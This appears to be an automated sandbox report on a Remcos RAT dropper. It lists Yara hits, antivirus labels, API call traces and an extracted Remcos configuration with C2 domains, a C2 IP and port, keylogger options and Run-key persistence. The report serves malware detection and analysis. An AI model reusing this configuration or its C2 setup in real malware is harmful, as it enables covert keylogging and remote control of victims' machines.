Source: Yara match	File source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6304, type: MEMORYSTR

Antivirus / Scanner detection for submitted sample

Source: kyFBQxVbsg.exe

Avira: detected

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe

ReversingLabs: Detection: 57%

Machine Learning detection for sample

Source: kyFBQxVbsg.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe

Joe Sandbox ML: detected

Source: 26.2.InstallUtil.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.1.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.7.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.8.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 0.2.kyFBQxVbsg.exe.2e0000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 28.0.InstallUtil.exe.400000.5.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.2.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.3.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.4.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 19.2.Qerdo.exe.40000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 28.0.InstallUtil.exe.400000.3.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.7.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.7.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.1.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.2.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.6.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 19.0.Qerdo.exe.40000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 28.2.InstallUtil.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.4.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.5.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.6.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 24.2.Qerdo.exe.9a0000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 28.0.InstallUtil.exe.400000.1.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.8.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 24.0.Qerdo.exe.9a0000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 26.0.InstallUtil.exe.400000.5.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.2.InstallUtil.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 0.0.kyFBQxVbsg.exe.2e0000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 17.0.InstallUtil.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.6.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.4.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.2.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.8.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.3.unpack	Avira: Label: BDS/Backdoor.Gen

Source: 26.2.InstallUtil.exe.400000.0.unpack

Malware Configuration Extractor: Remcos {"Version": "3.5.1 Pro", "Host:Port:Password": "nikahuve.ac.ug:6968:0kalskala.ac.ug:6968:0tuekisaa.ac.ug:6968:0parthaha.ac.ug:6968:0", "Assigned name": "06192022", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "cvxyttydfsgbghfgfhtd-RXTSAM", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "scxs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "forbas", "Keylog file max size": "0"}

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00430185 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

17_2_00430185

Source: kyFBQxVbsg.exe, 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: kyFBQxVbsg.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: kyFBQxVbsg.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: protobuf-net.pdbSHA256 source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00406571 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,GetFileAttributesW,DeleteFileW,Sleep,StrToIntA,CreateDirectoryW,

17_2_00406571

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0040A1C4 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	17_2_0040A1C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0040620E FindFirstFileW,FindNextFileW,	17_2_0040620E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004162EF FindFirstFileW,FindNextFileW,FindNextFileW,	17_2_004162EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0040A3CB FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	17_2_0040A3CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0044A569 FindFirstFileExA,	17_2_0044A569
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004187B1 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	17_2_004187B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00407AC0 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_00407AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00407ED2 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_00407ED2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00406EEF __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	17_2_00406EEF

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: nikahuve.ac.ug

Source: Joe Sandbox View

ASN Name: DANILENKODE DANILENKODE

Source: Joe Sandbox View

IP Address: 194.5.98.107 194.5.98.107

Source: global traffic

TCP traffic: 192.168.2.6:49798 -> 194.5.98.107:6968

Source: InstallUtil.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: kyFBQxVbsg.exe, 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: kyFBQxVbsg.exe, 00000000.00000002.540068634.000000000269C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: kyFBQxVbsg.exe, 00000000.00000002.540068634.000000000269C000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000002.597952189.000000000239C000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000002.610776047.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown

DNS traffic detected: queries for: nikahuve.ac.ug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_0042386F recv,

17_2_0042386F

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00408B9A GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,

17_2_00408B9A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00409D9C OpenClipboard,GetClipboardData,CloseClipboard,

17_2_00409D9C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00409D9C OpenClipboard,GetClipboardData,CloseClipboard,

17_2_00409D9C

Source: Qerdo.exe, 00000013.00000002.597284812.0000000000878000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6304, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

